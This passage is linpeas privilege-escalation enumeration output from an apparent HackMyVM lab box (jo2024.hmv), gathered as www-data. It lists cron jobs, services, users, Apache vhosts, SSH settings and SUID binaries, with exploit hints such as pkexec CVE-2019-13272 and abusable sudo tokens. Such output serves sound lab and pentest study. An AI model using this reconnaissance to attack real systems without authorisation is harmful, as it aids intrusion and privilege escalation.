-rwxr-xr-x   1 root root  313 Jan 10  2023 0anacron

/etc/cron.weekly:
total 20
drwxr-xr-x   2 root root 4096 Mar  9  2024 .
drwxr-xr-x 107 root root 4096 Jul 29 16:15 ..
-rw-r--r--   1 root root  102 Mar  2  2023 .placeholder
-rwxr-xr-x   1 root root  312 Jan 10  2023 0anacron
-rwxr-xr-x   1 root root 1055 Mar 12  2023 man-db

/etc/cron.yearly:
total 12
drwxr-xr-x   2 root root 4096 Mar  9  2024 .
drwxr-xr-x 107 root root 4096 Jul 29 16:15 ..
-rw-r--r--   1 root root  102 Mar  2  2023 .placeholder

/var/spool/anacron:
total 20
drwxr-xr-x 2 root root 4096 Mar  9  2024 .
drwxr-xr-x 4 root root 4096 Mar  9  2024 ..
-rw------- 1 root root    9 Dec 19 01:26 cron.daily
-rw------- 1 root root    9 Dec 19 01:36 cron.monthly
-rw------- 1 root root    9 Dec 19 01:31 cron.weekly

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }
47 6    * * 7   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }
52 6    1 * *   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }


SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
HOME=/root
LOGNAME=root

1       5       cron.daily      run-parts --report /etc/cron.daily
7       10      cron.weekly     run-parts --report /etc/cron.weekly
@monthly        15      cron.monthly    run-parts --report /etc/cron.monthly

╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT                        LEFT          LAST                         PASSED               UNIT                         ACTIVATES
Thu 2024-12-19 02:09:00 CET 22min left    Thu 2024-12-19 01:39:01 CET  7min ago             phpsessionclean.timer        phpsessionclean.service
Thu 2024-12-19 03:26:53 CET 1h 40min left Mon 2024-07-29 12:59:26 CEST 4 months 20 days ago apt-daily.timer              apt-daily.service
Thu 2024-12-19 06:30:00 CET 4h 43min left Thu 2024-12-19 01:41:51 CET  4min 23s ago         apt-daily-upgrade.timer      apt-daily-upgrade.service
Thu 2024-12-19 07:31:20 CET 5h 45min left Thu 2024-12-19 01:22:23 CET  23min ago            anacron.timer                anacron.service
Thu 2024-12-19 08:28:43 CET 6h left       Mon 2024-07-29 10:50:36 CEST 4 months 20 days ago man-db.timer                 man-db.service
Fri 2024-12-20 00:00:00 CET 22h left      -                            -                    dpkg-db-backup.timer         dpkg-db-backup.service
Fri 2024-12-20 00:00:00 CET 22h left      Thu 2024-12-19 01:21:31 CET  24min ago            logrotate.timer              logrotate.service
Fri 2024-12-20 01:36:28 CET 23h left      Thu 2024-12-19 01:36:28 CET  9min ago             systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2024-12-22 03:10:36 CET 3 days left   Thu 2024-12-19 01:22:01 CET  24min ago            e2scrub_all.timer            e2scrub_all.service
Mon 2024-12-23 01:26:35 CET 3 days left   Thu 2024-12-19 01:25:51 CET  20min ago            fstrim.timer                 fstrim.service

╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers

╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/networking.service could be executing some relative path
/etc/systemd/system/network-online.target.wants/networking.service could be executing some relative path
You can't write on systemd PATH

╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/usr/lib/systemd/system/dbus.socket is calling this writable listener: /run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout

╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
sed: -e expression #1, char 0: no previous regular expression
/run/dbus/system_bus_socket
  └─(Read Write)
/run/systemd/fsck.progress
/run/systemd/inaccessible/sock
/run/systemd/io.system.ManagedOOM
  └─(Read Write)
/run/systemd/journal/dev-log
  └─(Read Write)
/run/systemd/journal/io.systemd.journal
/run/systemd/journal/socket
  └─(Read Write)
/run/systemd/journal/stdout
  └─(Read Write)
/run/systemd/notify
  └─(Read Write)
/run/systemd/private
/run/systemd/userdb/io.systemd.DynamicUser
  └─(Read Write)
/run/udev/control
/run/user/1000/at-spi/bus_0
/run/user/1000/bus
/run/user/1000/gcr/ssh
/run/user/1000/gnupg/S.dirmngr
/run/user/1000/gnupg/S.gpg-agent
/run/user/1000/gnupg/S.gpg-agent.browser
/run/user/1000/gnupg/S.gpg-agent.extra
/run/user/1000/gnupg/S.gpg-agent.ssh
/run/user/1000/keyring/control
/run/user/1000/keyring/pkcs11
/run/user/1000/menu-cached-:0
/run/user/1000/pcmanfm-socket--0
/run/user/1000/pulse/native
/run/user/1000/systemd/private
/tmp/.X11-unix/X0
/tmp/ssh-XXXXXXB0v5tx/agent.740
/tmp/ssh-XXXXXXabpqOO/agent.842

╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME                                                 PID PROCESS         USER             CONNECTION    UNIT                      SESSION DESCRIPTION
:1.0                                                 276 systemd-timesyn systemd-timesync :1.0          systemd-timesyncd.service -       -
:1.1                                                 508 dundee          root             :1.1          dundee.service            -       -
:1.10                                                635 Xorg            root             :1.10         lightdm.service           -       -
:1.12                                                717 lightdm         root             :1.12         session-1.scope           1       -
:1.15                                                722 systemd         vanity           :1.15         user@1000.service         -       -
:1.17                                                756 rtkit-daemon    root             :1.17         rtkit-daemon.service      -       -
:1.2                                                 510 ofonod          root             :1.2          ofono.service             -       -
:1.20                                                851 xscreensaver-sy vanity           :1.20         session-1.scope           1       -
:1.21                                                830 lxpolkit        vanity           :1.21         session-1.scope           1       -
:1.23                                                943 xdg-desktop-por vanity           :1.23         user@1000.service         -       -
:1.24                                                920 xdg-desktop-por vanity           :1.24         user@1000.service         -       -
:1.25                                                961 gnome-keyring-d vanity           :1.25         user@1000.service         -       -
:1.26                                                991 gvfs-udisks2-vo vanity           :1.26         user@1000.service         -       -
:1.3                                                   1 systemd         root             :1.3          init.scope                -       -
:1.33                                              10509 busctl          www-data         :1.33         apache2.service           -       -
:1.4                                                 515 udisksd         root             :1.4          udisks2.service           -       -
:1.5                                                 522 wpa_supplicant  root             :1.5          wpa_supplicant.service    -       -
:1.6                                                 520 connmand        root             :1.6          connman.service           -       -
:1.7                                                 511 systemd-logind  root             :1.7          systemd-logind.service    -       -
:1.8                                                 565 polkitd         polkitd          :1.8          polkit.service            -       -
:1.9                                                 573 lightdm         root             :1.9          lightdm.service           -       -
fi.w1.wpa_supplicant1                                522 wpa_supplicant  root             :1.5          wpa_supplicant.service    -       -
net.connman                                          520 connmand        root             :1.6          connman.service           -       -
 -- UID=0 EUID=0 
org.bluez                                              - -               -                (activatable) -                         -       -
org.freedesktop.DBus                                   1 systemd         root             -             init.scope                -       -
org.freedesktop.DisplayManager                       573 lightdm         root             :1.9          lightdm.service           -       -
org.freedesktop.PolicyKit1                           565 polkitd         polkitd          :1.8          polkit.service            -       -
org.freedesktop.RealtimeKit1                         756 rtkit-daemon    root             :1.17         rtkit-daemon.service      -       -
org.freedesktop.SystemToolsBackends                    - -               -                (activatable) -                         -       -
org.freedesktop.SystemToolsBackends.GroupConfig2       - -               -                (activatable) -                         -       -
org.freedesktop.SystemToolsBackends.GroupsConfig2      - -               -                (activatable) -                         -       -
org.freedesktop.SystemToolsBackends.HostsConfig        - -               -                (activatable) -                         -       -
org.freedesktop.SystemToolsBackends.IfacesConfig       - -               -                (activatable) -                         -       -
org.freedesktop.SystemToolsBackends.NFSConfig          - -               -                (activatable) -                         -       -
org.freedesktop.SystemToolsBackends.NTPConfig          - -               -                (activatable) -                         -       -
org.freedesktop.SystemToolsBackends.Platform           - -               -                (activatable) -                         -       -
org.freedesktop.SystemToolsBackends.SMBConfig          - -               -                (activatable) -                         -       -
org.freedesktop.SystemToolsBackends.SelfConfig2        - -               -                (activatable) -                         -       -
org.freedesktop.SystemToolsBackends.ServiceConfig2     - -               -                (activatable) -                         -       -
org.freedesktop.SystemToolsBackends.ServicesConfig     - -               -                (activatable) -                         -       -
org.freedesktop.SystemToolsBackends.TimeConfig         - -               -                (activatable) -                         -       -
org.freedesktop.SystemToolsBackends.UserConfig2        - -               -                (activatable) -                         -       -
org.freedesktop.SystemToolsBackends.UsersConfig2       - -               -                (activatable) -                         -       -
org.freedesktop.UDisks2                              515 udisksd         root             :1.4          udisks2.service           -       -
org.freedesktop.hostname1                              - -               -                (activatable) -                         -       -
org.freedesktop.locale1                                - -               -                (activatable) -                         -       -
org.freedesktop.login1                               511 systemd-logind  root             :1.7          systemd-logind.service    -       -
org.freedesktop.network1                               - -               -                (activatable) -                         -       -
org.freedesktop.systemd1                               1 systemd         root             :1.3          init.scope                -       -
org.freedesktop.timedate1                              - -               -                (activatable) -                         -       -
org.freedesktop.timesync1                            276 systemd-timesyn systemd-timesync :1.0          systemd-timesyncd.service -       -
org.ofono                                            510 ofonod          root             :1.2          ofono.service             -       -
 -- UID=0 EUID=0 
org.ofono.dundee                                     508 dundee          root             :1.1          dundee.service            -       -
 -- UID=0 EUID=0 
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/bluetooth.conf (  <policy group="bluetooth">)
Possible weak user policy found on /etc/dbus-1/system.d/pulseaudio-system.conf (  <policy user="pulse">)
Possible weak user policy found on /etc/dbus-1/system.d/wpa_supplicant.conf (        <policy group="netdev">)



                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
                              ╚═════════════════════╝
╔══════════╣ Interfaces
default         0.0.0.0
loopback        127.0.0.0
link-local      169.254.0.0

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:1f:07:53 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.106/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 455sec preferred_lft 455sec
    inet 192.168.56.105/24 brd 192.168.56.255 scope global secondary enp0s3
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe1f:753/64 scope link 
       valid_lft forever preferred_lft forever

╔══════════╣ Hostname, hosts and DNS
jo2024.hmv
127.0.0.1       localhost
127.0.1.1       jo2024.hmv

::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 1.1.1.1
nameserver 8.8.8.8
nameserver 9.9.9.9
hmv

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp   LISTEN 0      10       127.0.0.1%lo:53        0.0.0.0:*          
tcp   LISTEN 0      128           0.0.0.0:22        0.0.0.0:*          
tcp   LISTEN 0      10           [::1]%lo:53           [::]:*          
tcp   LISTEN 0      511                 *:80              *:*          
tcp   LISTEN 0      128              [::]:22           [::]:*          

╔══════════╣ Can I sniff with tcpdump?
No



                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
                               ╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=33(www-data) gid=33(www-data) groups=33(www-data)

╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid

./linpeas.sh: 3390: get_current_user_privot_pid: not found
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is disabled (0), so sudo tokens could be abused

╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Users with console
root:x:0:0:root:/root:/bin/bash
vanity:x:1000:1000:,,,:/home/vanity:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=1000(vanity) gid=1000(vanity) groups=1000(vanity),100(users)
uid=101(avahi-autoipd) gid=109(avahi-autoipd) groups=109(avahi-autoipd)
uid=102(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=103(tss) gid=111(tss) groups=111(tss)
uid=104(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=105(pulse) gid=112(pulse) groups=112(pulse),29(audio)
uid=106(lightdm) gid=114(lightdm) groups=114(lightdm)
uid=107(rtkit) gid=115(rtkit) groups=115(rtkit)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=42(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=996(polkitd) gid=996(polkitd) groups=996(polkitd)
uid=997(systemd-timesync) gid=997(systemd-timesync) groups=997(systemd-timesync)
uid=998(systemd-network) gid=998(systemd-network) groups=998(systemd-network)

╔══════════╣ Login now
 01:46:16 up 24 min,  1 user,  load average: 0.15, 0.12, 0.30
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
vanity   tty7     :0               01:21   24:46   0.00s  0.02s /usr/bin/lxsession -s LXDE -e LXDE

╔══════════╣ Last logons
mulder   pts/1        Sat Mar  9 14:48:27 2024 - Sat Mar  9 14:48:30 2024  (00:00)     192.168.0.30
mulder   pts/1        Sat Mar  9 14:45:09 2024 - Sat Mar  9 14:47:37 2024  (00:02)     192.168.0.30
root     pts/0        Sat Mar  9 14:34:59 2024 - down                      (17:54)     192.168.0.30
root     pts/0        Sat Mar  9 14:28:39 2024 - Sat Mar  9 14:34:58 2024  (00:06)     192.168.0.30
root     pts/0        Sat Mar  9 14:27:54 2024 - Sat Mar  9 14:27:58 2024  (00:00)     192.168.0.30
debian   pts/0        Sat Mar  9 14:26:59 2024 - Sat Mar  9 14:27:39 2024  (00:00)     192.168.0.30
debian   pts/0        Sat Mar  9 14:26:38 2024 - Sat Mar  9 14:26:51 2024  (00:00)     192.168.0.30
reboot   system boot  Sat Mar  9 12:39:49 2024 - Sun Mar 10 08:29:39 2024  (19:49)     0.0.0.0

wtmp begins Sat Mar  9 12:39:49 2024

╔══════════╣ Last time logon each user

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)

╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!



                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
                             ╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers

╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.61 (Debian)
Server built:   2024-07-07T12:08:26
httpd Not Found

Nginx version: nginx Not Found

/etc/apache2/mods-enabled/php8.2.conf-<FilesMatch ".+\.ph(?:ar|p|tml)$">
/etc/apache2/mods-enabled/php8.2.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-enabled/php8.2.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-enabled/php8.2.conf:    SetHandler application/x-httpd-php-source
--
/etc/apache2/mods-available/php8.2.conf-<FilesMatch ".+\.ph(?:ar|p|tml)$">
/etc/apache2/mods-available/php8.2.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php8.2.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-available/php8.2.conf:    SetHandler application/x-httpd-php-source
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Jul 28 10:42 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Jul 28 10:42 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Jul 28 10:42 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
    ServerAdmin webmaster@localhost
    ServerName jo2024.hmv
    DocumentRoot /var/www/html
    ErrorLog ${APACHE_LOG_DIR}/jo.hmv.error.log
    CustomLog ${APACHE_LOG_DIR}/jo.hmv.access.log combined
    <Directory /var/www/html>
        Options Indexes FollowSymLinks
        AllowOverride All
        Require all granted
    </Directory>
</VirtualHost>
<VirtualHost *:80>
    ServerAdmin webmaster@jo2024.hmv
    ServerName pictures.jo2024.hmv
    DocumentRoot /var/www/picture
    ErrorLog ${APACHE_LOG_DIR}/pictures.jo.hmv.error.log
    CustomLog ${APACHE_LOG_DIR}/pictures.jo.hmv.access.log combined
    <Directory /var/www/picture>
        Options Indexes FollowSymLinks
        AllowOverride All
        Require all granted
    </Directory>
</VirtualHost>


-rw-r--r-- 1 root root 787 Jul 29 13:45 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
    ServerAdmin webmaster@localhost
    ServerName jo2024.hmv
    DocumentRoot /var/www/html
    ErrorLog ${APACHE_LOG_DIR}/jo.hmv.error.log
    CustomLog ${APACHE_LOG_DIR}/jo.hmv.access.log combined
    <Directory /var/www/html>
        Options Indexes FollowSymLinks
        AllowOverride All
        Require all granted
    </Directory>
</VirtualHost>
<VirtualHost *:80>
    ServerAdmin webmaster@jo2024.hmv
    ServerName pictures.jo2024.hmv
    DocumentRoot /var/www/picture
    ErrorLog ${APACHE_LOG_DIR}/pictures.jo.hmv.error.log
    CustomLog ${APACHE_LOG_DIR}/pictures.jo.hmv.access.log combined
    <Directory /var/www/picture>
        Options Indexes FollowSymLinks
        AllowOverride All
        Require all granted
    </Directory>
</VirtualHost>
lrwxrwxrwx 1 root root 35 Jul 28 10:42 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
    ServerAdmin webmaster@localhost
    ServerName jo2024.hmv
    DocumentRoot /var/www/html
    ErrorLog ${APACHE_LOG_DIR}/jo.hmv.error.log
    CustomLog ${APACHE_LOG_DIR}/jo.hmv.access.log combined
    <Directory /var/www/html>
        Options Indexes FollowSymLinks
        AllowOverride All
        Require all granted
    </Directory>
</VirtualHost>
<VirtualHost *:80>
    ServerAdmin webmaster@jo2024.hmv
    ServerName pictures.jo2024.hmv
    DocumentRoot /var/www/picture
    ErrorLog ${APACHE_LOG_DIR}/pictures.jo.hmv.error.log
    CustomLog ${APACHE_LOG_DIR}/pictures.jo.hmv.access.log combined
    <Directory /var/www/picture>
        Options Indexes FollowSymLinks
        AllowOverride All
        Require all granted
    </Directory>
</VirtualHost>

-rw-r--r-- 1 root root 73890 Jun 17  2024 /etc/php/8.2/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 73886 Jun 17  2024 /etc/php/8.2/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On



╔══════════╣ Analyzing X11 Files (limit 70)
-rw------- 1 vanity vanity 158 Dec 19 01:21 /home/vanity/.Xauthority

╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Jul 29 16:04 /etc/pam.d
-rw-r--r-- 1 root root 2133 Dec 19  2023 /etc/pam.d/sshd
account    required     pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so close
session    required     pam_loginuid.so
session    optional     pam_keyinit.so force revoke
session    optional     pam_motd.so  motd=/run/motd.dynamic
session    optional     pam_motd.so noupdate
session    optional     pam_mail.so standard noenv # [1]
session    required     pam_limits.so
session    required     pam_env.so # [1]
session    required     pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so open


╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Mar  9  2024 /etc/ldap


╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 May 25  2023 /etc/apt/keyrings
drwxr-xr-x 2 root root 4096 Mar  9  2024 /usr/share/keyrings




╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 761 Apr  3  2022 /usr/share/bash-completion/completions/postfix


╔══════════╣ Analyzing FTP Files (limit 70)



-rw-r--r-- 1 root root 69 Jun 17  2024 /etc/php/8.2/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Jun 17  2024 /usr/share/php8.2-common/common/ftp.ini






╔══════════╣ Analyzing DNS Files (limit 70)
-rw-r--r-- 1 root root 826 Apr  3  2022 /usr/share/bash-completion/completions/bind
-rw-r--r-- 1 root root 826 Apr  3  2022 /usr/share/bash-completion/completions/bind




╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3526 Apr 23  2023 /etc/skel/.bashrc
-rw-r--r-- 1 vanity vanity 3526 Jul 29 13:48 /home/vanity/.bashrc



-rw------- 1 vanity vanity 36 Jul 29 13:48 /home/vanity/.lesshst


-rw-r--r-- 1 root root 807 Apr 23  2023 /etc/skel/.profile
-rw-r--r-- 1 vanity vanity 807 Jul 29 13:48 /home/vanity/.profile





╔══════════╣ Searching mysql credentials and exec

╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
gpg Not Found
netpgpkeys Not Found
netpgp Not Found

-rw-r--r-- 1 root root 3902 Mar 26  2023 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 8700 Jul 30  2023 /usr/share/keyrings/debian-archive-bookworm-automatic.gpg
-rw-r--r-- 1 root root 8709 Jul 30  2023 /usr/share/keyrings/debian-archive-bookworm-security-automatic.gpg
-rw-r--r-- 1 root root 280 Jul 30  2023 /usr/share/keyrings/debian-archive-bookworm-stable.gpg
-rw-r--r-- 1 root root 8700 Jul 30  2023 /usr/share/keyrings/debian-archive-bullseye-automatic.gpg
-rw-r--r-- 1 root root 8709 Jul 30  2023 /usr/share/keyrings/debian-archive-bullseye-security-automatic.gpg
-rw-r--r-- 1 root root 2453 Jul 30  2023 /usr/share/keyrings/debian-archive-bullseye-stable.gpg
-rw-r--r-- 1 root root 8132 Jul 30  2023 /usr/share/keyrings/debian-archive-buster-automatic.gpg
-rw-r--r-- 1 root root 8141 Jul 30  2023 /usr/share/keyrings/debian-archive-buster-security-automatic.gpg
-rw-r--r-- 1 root root 2332 Jul 30  2023 /usr/share/keyrings/debian-archive-buster-stable.gpg
-rw-r--r-- 1 root root 56156 Jul 30  2023 /usr/share/keyrings/debian-archive-keyring.gpg
-rw-r--r-- 1 root root 54031 Jul 30  2023 /usr/share/keyrings/debian-archive-removed-keys.gpg


╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)





-rw-r--r-- 1 root root 173 Mar  9  2024 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 93 Mar  9  2024 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 565 Mar  9  2024 /etc/ssh/ssh_host_rsa_key.pub

PermitRootLogin yes
UsePAM yes

══╣ Possible private SSH keys were found!
/etc/ImageMagick-6/mime.xml

══╣ Some certificates were found (out limited):
/etc/ssl/certs/ACCVRAIZ1.pem
/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem
/etc/ssl/certs/AC_RAIZ_FNMT-RCM_SERVIDORES_SEGUROS.pem
/etc/ssl/certs/ANF_Secure_Server_Root_CA.pem
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/Amazon_Root_CA_1.pem
/etc/ssl/certs/Amazon_Root_CA_2.pem
/etc/ssl/certs/Amazon_Root_CA_3.pem
/etc/ssl/certs/Amazon_Root_CA_4.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068_2.pem
/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
/etc/ssl/certs/Buypass_Class_3_Root_CA.pem
/etc/ssl/certs/CA_Disig_Root_R2.pem
3479PSTORAGE_CERTSBIN

══╣ Writable ssh and gpg agents
/etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket
/etc/systemd/user/sockets.target.wants/gpg-agent.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
Include /etc/ssh/sshd_config.d/*.conf
KbdInteractiveAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem       sftp    /usr/lib/openssh/sftp-server

══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow


Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes




                      ╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
                      ╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
strace Not Found
-rwsr-xr-x 1 root root 159K Mar 23  2023 /usr/bin/ntfs-3g  --->  Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
-rwsr-xr-x 1 root root 67K Mar 23  2023 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 71K Mar 28  2024 /usr/bin/su
-rwsr-xr-x 1 root root 52K Mar 23  2023 /usr/bin/chsh
-rwsr-xr-x 1 root root 35K Apr 18  2023 /usr/bin/fusermount3
-rwsr-xr-x 1 root root 62K Mar 23  2023 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 27K Jan 31  2023 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 87K Mar 23  2023 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 35K Mar 28  2024 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 276K Jun 27  2023 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 48K Mar 23  2023 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 28  2024 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 43K Sep 18  2022 /usr/sbin/userhelper
-rwsr-sr-x 1 root root 15K Apr 10  2024 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 639K Jun 22 21:38 /usr/lib/openssh/ssh-keysign
